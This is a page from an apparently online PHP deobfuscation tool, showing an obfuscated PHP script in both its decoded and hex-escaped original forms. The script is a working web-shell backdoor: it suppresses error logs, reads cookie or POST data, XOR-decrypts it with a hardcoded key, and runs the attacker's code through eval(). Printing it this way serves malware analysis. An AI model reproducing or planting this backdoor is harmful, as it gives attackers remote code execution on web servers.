Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $ { "\x47\x4cOB\x41\x4cS" } ["\x68\x76\x72\x74x\x69"] = "\x61\x75th"; $ ..

Decoded Output download

<?php 
$ 
	{ 
	"GLOBALS" 
	} 
 
["hvrtxi"] = "auth"; 
$ 
	{ 
	"GLOBALS" 
	} 
 
["lwuffgd"] = "data_key"; 
$ 
	{ 
	"GLOBALS" 
	} 
 
["kqmpkztvjy"] = "value"; 
$ 
	{ 
	"GLOBALS" 
	} 
 
["emhlsyaen"] = "out_data"; 
$ 
	{ 
	"GLOBALS" 
	} 
 
["gprcgurctw"] = "key"; 
$ 
	{ 
	"GLOBALS" 
	} 
 
["aszpkkhenn"] = "j"; 
$ 
	{ 
	"GLOBALS" 
	} 
 
["tijgxywy"] = "i"; 
$ 
	{ 
	"GLOBALS" 
	} 
 
["iblnehdk"] = "data"; 
@ini_set("error_log", NULL); 
@ini_set("log_errors", 0); 
@ini_set("max_execution_time", 0); 
@set_time_limit(0); 
 
if (!defined("PHP_EOL")) 
	{ 
	define("PHP_EOL", "
"); 
	} 
 
if (!defined("DIRECTORY_SEPARATOR")) 
	{ 
	define("DIRECTORY_SEPARATOR", "/"); 
	} 
 
$ 
	{ 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["iblnehdk"] 
	} = NULL; 
$ 
	{ 
	"GLOBALS" 
	} 
 
["souskpnmbw"] = "data"; 
$aysxyhokafll = "data_key"; 
$yxjeetzrlad = "data_key"; 
$ 
	{ 
	$yxjeetzrlad 
	} = NULL; 
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b"; 
global $auth; 
 
function sh_decrypt_phase($data, $key) 
	{ 
	$ffnnqis = "data"; 
	$saybmtl = "out_data"; 
	$ 
		{ 
		$saybmtl 
		} = ""; 
	for ($ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["tijgxywy"] 
		} = 0; $ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["tijgxywy"] 
		} < strlen($ 
		{ 
		$ffnnqis 
		});) 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["vxdvwdmsb"] = "j"; 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["heowkan"] = "i"; 
		$shgiqyj = "data"; 
		for ($ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["aszpkkhenn"] 
			} = 0; $ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["aszpkkhenn"] 
			} < strlen($ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["gprcgurctw"] 
			}) && $ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["tijgxywy"] 
			} < strlen($ 
			{ 
			$shgiqyj 
			}); $ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["vxdvwdmsb"] 
			} 
 
		++, $ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["heowkan"] 
			} 
 
		++) 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["qvtpphqpdq"] = "data"; 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["vwizqlycx"] = "i"; 
			$ 
				{ 
				$ 
					{ 
					"GLOBALS" 
					} 
 
				["emhlsyaen"] 
				}.= chr(ord($ 
				{ 
				$ 
					{ 
					"GLOBALS" 
					} 
 
				["qvtpphqpdq"] 
				} 
 
			[$ 
				{ 
				$ 
					{ 
					"GLOBALS" 
					} 
 
				["vwizqlycx"] 
				} 
 
			]) ^ ord($ 
				{ 
				$ 
					{ 
					"GLOBALS" 
					} 
 
				["gprcgurctw"] 
				} 
 
			[$ 
				{ 
				$ 
					{ 
					"GLOBALS" 
					} 
 
				["aszpkkhenn"] 
				} 
 
			])); 
			} 
		} 
 
	return $ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["emhlsyaen"] 
		}; 
	} 
 
$insfkk = "data"; 
 
function sh_decrypt($data, $key) 
	{ 
	global $auth; 
	$vuuogtpxiqk = "auth"; 
	return sh_decrypt_phase(sh_decrypt_phase($ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["iblnehdk"] 
		} 
 
	, $ 
		{ 
		$vuuogtpxiqk 
		}) , $ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["gprcgurctw"] 
		}); 
	} 
 
foreach($_COOKIE as $ 
	{ 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["gprcgurctw"] 
	} => $ 
	{ 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["kqmpkztvjy"] 
	}) 
	{ 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["kjyvpu"] = "data_key"; 
	$zoamkqrgbfh = "value"; 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["jovduifbno"] = "data"; 
	$ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["jovduifbno"] 
		} = $ 
		{ 
		$zoamkqrgbfh 
		}; 
	$ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["kjyvpu"] 
		} = $ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["gprcgurctw"] 
		}; 
	} 
 
if (!$ 
	{ 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["iblnehdk"] 
	}) 
	{ 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["ljwyfqzjjl"] = "value"; 
	foreach($_POST as $ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["gprcgurctw"] 
		} => $ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["ljwyfqzjjl"] 
		}) 
		{ 
		$ipgrvdc = "data"; 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["yfufrsc"] = "value"; 
		$ 
			{ 
			$ipgrvdc 
			} = $ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["yfufrsc"] 
			}; 
		$ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["lwuffgd"] 
			} = $ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["gprcgurctw"] 
			}; 
		} 
	} 
 
$ 
	{ 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["souskpnmbw"] 
	} = @unserialize(sh_decrypt(@base64_decode($ 
	{ 
	$insfkk 
	}) , $ 
	{ 
	$aysxyhokafll 
	})); 
$ 
	{ 
	"GLOBALS" 
	} 
 
["paywhrpfv"] = "data"; 
 
if (isset($ 
	{ 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["paywhrpfv"] 
	} 
 
["ak"]) && $ 
	{ 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["hvrtxi"] 
	} == $ 
	{ 
	$ 
		{ 
		"GLOBALS" 
		} 
 
	["iblnehdk"] 
	} 
 
["ak"]) 
	{ 
	$ydnczfxqgq = "data"; 
	if ($ 
		{ 
		$ 
			{ 
			"GLOBALS" 
			} 
 
		["iblnehdk"] 
		} 
 
	["a"] == "i") 
		{ 
		$ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["tijgxywy"] 
			} = Array( 
			"pv" => @phpversion() , 
			"sv" => "1.0-1", 
		); 
		echo @serialize($ 
			{ 
			$ 
				{ 
				"GLOBALS" 
				} 
 
			["tijgxywy"] 
			}); 
		} 
	elseif ($ 
		{ 
		$ydnczfxqgq 
		} 
 
	["a"] == "e") 
		{ 
		$mwvvynwbxyi = "data"; 
		eval($ 
			{ 
			$mwvvynwbxyi 
			} 
 
		["d"]); 
		} 
 
	exit(); 
	} 
 
?>

Did this file decode correctly?

Original Code

<?php
$
	{
	"\x47\x4cOB\x41\x4cS"
	}

["\x68\x76\x72\x74x\x69"] = "\x61\x75th";
$
	{
	"\x47\x4c\x4f\x42AL\x53"
	}

["l\x77\x75\x66fg\x64"] = "\x64a\x74\x61\x5f\x6b\x65\x79";
$
	{
	"G\x4c\x4fBA\x4c\x53"
	}

["\x6b\x71m\x70\x6bztv\x6a\x79"] = "va\x6cu\x65";
$
	{
	"\x47\x4c\x4f\x42\x41\x4cS"
	}

["\x65mhl\x73\x79ae\x6e"] = "o\x75\x74_\x64\x61\x74\x61";
$
	{
	"\x47L\x4f\x42\x41LS"
	}

["\x67\x70\x72\x63\x67u\x72c\x74w"] = "\x6b\x65y";
$
	{
	"\x47\x4cO\x42\x41\x4c\x53"
	}

["\x61\x73\x7apkkhe\x6e\x6e"] = "\x6a";
$
	{
	"\x47\x4c\x4f\x42A\x4c\x53"
	}

["\x74i\x6a\x67\x78\x79wy"] = "i";
$
	{
	"\x47\x4c\x4fB\x41\x4c\x53"
	}

["ib\x6c\x6e\x65\x68\x64k"] = "\x64at\x61";
@ini_set("er\x72\x6f\x72\x5fl\x6fg", NULL);
@ini_set("log_\x65\x72r\x6f\x72s", 0);
@ini_set("\x6da\x78_ex\x65\x63u\x74\x69on\x5ftim\x65", 0);
@set_time_limit(0);

if (!defined("PHP\x5f\x45O\x4c"))
	{
	define("P\x48P\x5fEO\x4c", "\n");
	}

if (!defined("\x44\x49\x52\x45CTORY\x5fS\x45\x50\x41R\x41\x54OR"))
	{
	define("\x44IRE\x43T\x4f\x52\x59_SEP\x41R\x41T\x4f\x52", "/");
	}

$
	{
	$
		{
		"G\x4cOBA\x4c\x53"
		}

	["\x69\x62ln\x65\x68d\x6b"]
	} = NULL;
$
	{
	"\x47\x4c\x4f\x42A\x4cS"
	}

["\x73\x6fu\x73\x6bpn\x6db\x77"] = "\x64a\x74a";
$aysxyhokafll = "d\x61\x74\x61_\x6be\x79";
$yxjeetzrlad = "\x64\x61ta_\x6bey";
$
	{
	$yxjeetzrlad
	} = NULL;
$GLOBALS["a\x75t\x68"] = "\x34\x65f\x36\x33a\x62e-1abd-45\x61\x36-\x39\x31\x33\x64-6\x66\x62\x3996\x35\x37e\x324\x62";
global $auth;

function sh_decrypt_phase($data, $key)
	{
	$ffnnqis = "da\x74\x61";
	$saybmtl = "\x6f\x75t_\x64\x61t\x61";
	$
		{
		$saybmtl
		} = "";
	for ($
		{
		$
			{
			"\x47\x4cO\x42\x41\x4c\x53"
			}

		["\x74\x69j\x67\x78\x79\x77\x79"]
		} = 0; $
		{
		$
			{
			"\x47LO\x42A\x4c\x53"
			}

		["\x74\x69j\x67xy\x77\x79"]
		} < strlen($
		{
		$ffnnqis
		});)
		{
		$
			{
			"G\x4c\x4fB\x41LS"
			}

		["\x76xd\x76\x77\x64m\x73b"] = "\x6a";
		$
			{
			"\x47\x4cO\x42\x41\x4cS"
			}

		["\x68\x65\x6fw\x6ba\x6e"] = "\x69";
		$shgiqyj = "\x64\x61\x74a";
		for ($
			{
			$
				{
				"\x47\x4c\x4f\x42\x41\x4c\x53"
				}

			["\x61\x73z\x70k\x6b\x68\x65n\x6e"]
			} = 0; $
			{
			$
				{
				"\x47\x4c\x4f\x42A\x4c\x53"
				}

			["\x61\x73\x7a\x70\x6bk\x68\x65\x6e\x6e"]
			} < strlen($
			{
			$
				{
				"\x47L\x4f\x42\x41\x4cS"
				}

			["\x67\x70r\x63\x67\x75\x72\x63\x74\x77"]
			}) && $
			{
			$
				{
				"G\x4c\x4f\x42\x41\x4cS"
				}

			["t\x69jg\x78\x79\x77\x79"]
			} < strlen($
			{
			$shgiqyj
			}); $
			{
			$
				{
				"\x47\x4c\x4f\x42\x41\x4c\x53"
				}

			["\x76\x78\x64\x76w\x64\x6ds\x62"]
			}

		++, $
			{
			$
				{
				"G\x4c\x4f\x42A\x4c\x53"
				}

			["h\x65ow\x6ba\x6e"]
			}

		++)
			{
			$
				{
				"G\x4c\x4fBAL\x53"
				}

			["\x71\x76\x74\x70\x70\x68qp\x64\x71"] = "\x64a\x74\x61";
			$
				{
				"G\x4cOB\x41\x4c\x53"
				}

			["\x76\x77iz\x71\x6c\x79\x63\x78"] = "i";
			$
				{
				$
					{
					"G\x4c\x4fB\x41\x4c\x53"
					}

				["\x65m\x68\x6c\x73\x79a\x65\x6e"]
				}.= chr(ord($
				{
				$
					{
					"\x47L\x4fB\x41\x4c\x53"
					}

				["\x71v\x74p\x70\x68qp\x64\x71"]
				}

			[$
				{
				$
					{
					"G\x4cO\x42A\x4cS"
					}

				["\x76\x77\x69z\x71\x6c\x79\x63\x78"]
				}

			]) ^ ord($
				{
				$
					{
					"\x47\x4c\x4f\x42\x41\x4c\x53"
					}

				["g\x70\x72c\x67\x75r\x63\x74\x77"]
				}

			[$
				{
				$
					{
					"G\x4cO\x42\x41\x4c\x53"
					}

				["\x61\x73zp\x6b\x6b\x68e\x6e\x6e"]
				}

			]));
			}
		}

	return $
		{
		$
			{
			"\x47L\x4fB\x41L\x53"
			}

		["\x65mh\x6cs\x79a\x65\x6e"]
		};
	}

$insfkk = "\x64\x61\x74\x61";

function sh_decrypt($data, $key)
	{
	global $auth;
	$vuuogtpxiqk = "\x61u\x74\x68";
	return sh_decrypt_phase(sh_decrypt_phase($
		{
		$
			{
			"\x47L\x4fBAL\x53"
			}

		["\x69b\x6c\x6e\x65h\x64\x6b"]
		}

	, $
		{
		$vuuogtpxiqk
		}) , $
		{
		$
			{
			"G\x4cO\x42\x41\x4cS"
			}

		["\x67p\x72\x63\x67\x75\x72ct\x77"]
		});
	}

foreach($_COOKIE as $
	{
	$
		{
		"G\x4cO\x42\x41\x4c\x53"
		}

	["g\x70rcg\x75\x72\x63\x74\x77"]
	} => $
	{
	$
		{
		"\x47LO\x42\x41\x4c\x53"
		}

	["\x6b\x71\x6d\x70\x6b\x7a\x74v\x6ay"]
	})
	{
	$
		{
		"\x47L\x4fBA\x4c\x53"
		}

	["k\x6a\x79v\x70\x75"] = "d\x61t\x61_k\x65\x79";
	$zoamkqrgbfh = "v\x61l\x75e";
	$
		{
		"\x47\x4cO\x42ALS"
		}

	["jov\x64uif\x62n\x6f"] = "\x64\x61\x74a";
	$
		{
		$
			{
			"G\x4cOB\x41L\x53"
			}

		["j\x6f\x76d\x75\x69f\x62\x6eo"]
		} = $
		{
		$zoamkqrgbfh
		};
	$
		{
		$
			{
			"\x47\x4cO\x42\x41\x4c\x53"
			}

		["\x6b\x6a\x79\x76\x70\x75"]
		} = $
		{
		$
			{
			"\x47\x4c\x4f\x42AL\x53"
			}

		["g\x70\x72\x63gur\x63\x74\x77"]
		};
	}

if (!$
	{
	$
		{
		"\x47LO\x42\x41\x4c\x53"
		}

	["\x69\x62l\x6e\x65\x68dk"]
	})
	{
	$
		{
		"\x47\x4c\x4f\x42\x41\x4cS"
		}

	["l\x6aw\x79f\x71\x7a\x6aj\x6c"] = "\x76\x61l\x75e";
	foreach($_POST as $
		{
		$
			{
			"\x47\x4c\x4fB\x41\x4c\x53"
			}

		["g\x70\x72cg\x75\x72\x63\x74w"]
		} => $
		{
		$
			{
			"\x47\x4cOBAL\x53"
			}

		["l\x6a\x77\x79\x66q\x7a\x6a\x6a\x6c"]
		})
		{
		$ipgrvdc = "\x64\x61ta";
		$
			{
			"\x47\x4c\x4f\x42ALS"
			}

		["\x79\x66\x75fr\x73c"] = "\x76\x61l\x75e";
		$
			{
			$ipgrvdc
			} = $
			{
			$
				{
				"G\x4cOB\x41\x4c\x53"
				}

			["\x79\x66\x75\x66r\x73c"]
			};
		$
			{
			$
				{
				"\x47L\x4f\x42ALS"
				}

			["\x6cw\x75\x66\x66\x67d"]
			} = $
			{
			$
				{
				"\x47L\x4fB\x41LS"
				}

			["\x67\x70r\x63\x67urc\x74w"]
			};
		}
	}

$
	{
	$
		{
		"GLOB\x41\x4c\x53"
		}

	["sou\x73\x6bp\x6emb\x77"]
	} = @unserialize(sh_decrypt(@base64_decode($
	{
	$insfkk
	}) , $
	{
	$aysxyhokafll
	}));
$
	{
	"\x47\x4c\x4f\x42A\x4cS"
	}

["\x70a\x79w\x68\x72\x70\x66\x76"] = "\x64\x61\x74a";

if (isset($
	{
	$
		{
		"G\x4c\x4f\x42A\x4c\x53"
		}

	["\x70\x61\x79w\x68rp\x66\x76"]
	}

["ak"]) && $
	{
	$
		{
		"\x47\x4c\x4f\x42\x41L\x53"
		}

	["h\x76\x72\x74x\x69"]
	} == $
	{
	$
		{
		"\x47\x4c\x4f\x42\x41LS"
		}

	["\x69\x62\x6cn\x65\x68\x64\x6b"]
	}

["\x61k"])
	{
	$ydnczfxqgq = "\x64\x61t\x61";
	if ($
		{
		$
			{
			"G\x4cO\x42A\x4cS"
			}

		["\x69bl\x6e\x65\x68\x64k"]
		}

	["a"] == "i")
		{
		$
			{
			$
				{
				"\x47\x4c\x4f\x42\x41\x4c\x53"
				}

			["\x74ij\x67xy\x77\x79"]
			} = Array(
			"\x70v" => @phpversion() ,
			"\x73\x76" => "1.0-\x31",
		);
		echo @serialize($
			{
			$
				{
				"GL\x4f\x42\x41\x4c\x53"
				}

			["\x74\x69\x6a\x67x\x79\x77\x79"]
			});
		}
	elseif ($
		{
		$ydnczfxqgq
		}

	["a"] == "\x65")
		{
		$mwvvynwbxyi = "\x64\x61\x74\x61";
		eval($
			{
			$mwvvynwbxyi
			}

		["\x64"]);
		}

	exit();
	}

?>

Function Calls

None

Variables

None

Stats

MD5 61099b5c4d4601c40d6a60c478287e55
Eval Count 0
Decode Time 90 ms